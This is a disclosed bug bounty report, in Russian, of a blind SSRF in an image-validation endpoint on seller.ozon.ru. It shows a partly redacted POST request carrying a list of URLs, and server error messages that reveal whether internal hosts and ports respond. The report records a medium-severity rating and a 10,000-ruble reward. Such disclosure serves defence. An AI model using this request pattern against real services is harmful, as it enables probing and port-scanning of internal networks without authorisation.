Blind SSRF в методе валидации изображений [seller.ozon.ru]
Приветствую, в методе валидации изображений
#####
присутствует SSRF.Пример запроса:
POST ##### Host: seller.ozon.ru ... Accept-Language: ru Accept-Encoding: gzip, deflate, br Content-Type: application/json ##### ##### ##### Content-Length: 46 Origin: https://seller.ozon.ru Referer: ##### Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers {"urls":["http://##########"]}
В ответ приходит
{"images":[{"srcUrl":"http://##########","url":"","name":"","#####":{"code":"too_small","message":"Размер файла меньше допустимого 171 < 512"}}]}
на запрос например такого урла http://
'{%mask_value%}
'{%mask_value%}
получаем:{"images":[{"srcUrl":"http://##########","url":"","name":"","#####":{"code":"http_error","message":"request process failed: unknown error connection refused"}}]}
или например для
'{%mask_value%}
получаем wrong content type{"images":[{"srcUrl":"#####","url":"","name":"","#####":{"code":"wrong_content_type","message":"wrong_content_type"}}]}
Домены
'{%mask_value%}
и '{%mask_value%}
не резолвятся из внешней сети, получаем blind SSRF с возможностью посылать GET запросы во внутреннюю сеть, исследовать открытые порты и идентифицировать http сервисыReward
₽10,000
Ozon
Ozon
Report No.: 4152
Created: January 18, 2024, 18:47
Disclosed: April 16, 12:10
Status: Accepted
Type: Vulnerability
Severity:
Medium
CWE: CWE-918 Server-Side Request Forgery (SSRF)
Author:cutoffurmind
Comments
By
Shumilishskii
January 19, 2024
By
Shumilishskii
January 25, 2024